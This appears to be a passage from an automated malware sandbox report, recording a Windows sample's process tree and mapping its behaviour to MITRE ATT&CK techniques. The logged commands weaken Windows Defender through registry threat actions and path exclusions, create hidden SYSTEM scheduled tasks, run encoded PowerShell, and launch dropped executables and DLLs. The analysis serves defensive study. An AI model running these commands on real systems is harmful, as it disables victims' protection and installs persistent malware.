/v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4992

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:6120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:5516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:5504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:5984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:5412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1444

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
3⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
3⤵
PID:428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
3⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
3⤵
PID:5312

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkjLMAfZd" /SC once /ST 00:38:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:5396

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5428

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkjLMAfZd"
2⤵
PID:5888

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkjLMAfZd"
2⤵
PID:4180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 02:57:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exe\" sG /site_id 525403 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:3484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
2⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3416 -ip 3416
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3416 -ip 3416
1⤵
PID:5228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Executes dropped EXE
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
1⤵
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3624 -ip 3624
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3624 -ip 3624
1⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
1⤵
PID:5416

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 656 -p 5404 -ip 5404
1⤵
PID:4712

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 672 -p 5544 -ip 5544
1⤵
PID:5156

C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exe
C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exe sG /site_id 525403 /S
1⤵
- Loads dropped DLL
PID:1760

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"
2⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:5056

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:2776

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3652

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:3440

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\dsxDUM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
2⤵
- Creates scheduled task(s)
PID:5400

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cPyDayBYNpjUpuO2" /F /xml "C:\Program Files (x86)\QMuGxDzxU\PKBVUtZ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:6068

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "cPyDayBYNpjUpuO"
2⤵
PID:4300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "cPyDayBYNpjUpuO"
2⤵
PID:940

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "CKLLrKbBjRttlf" /F /xml "C:\Program Files (x86)\YhmfbgEUeceU2\HzNRJZl.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4008

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QtMzpEnQzbovF2" /F /xml "C:\ProgramData\hnkumIqTRwUxQLVB\IGQiZES.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2540

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jDcNWoQEywoxNtiMi2" /F /xml "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\AjrXMWl.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:5596

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DwrQigzmMruJpsQaMBv2" /F /xml "C:\Program Files (x86)\iTBLcazoBHNRC\TXhyGMl.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4232 -ip 4232
1⤵
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4232 -ip 4232
1⤵
PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery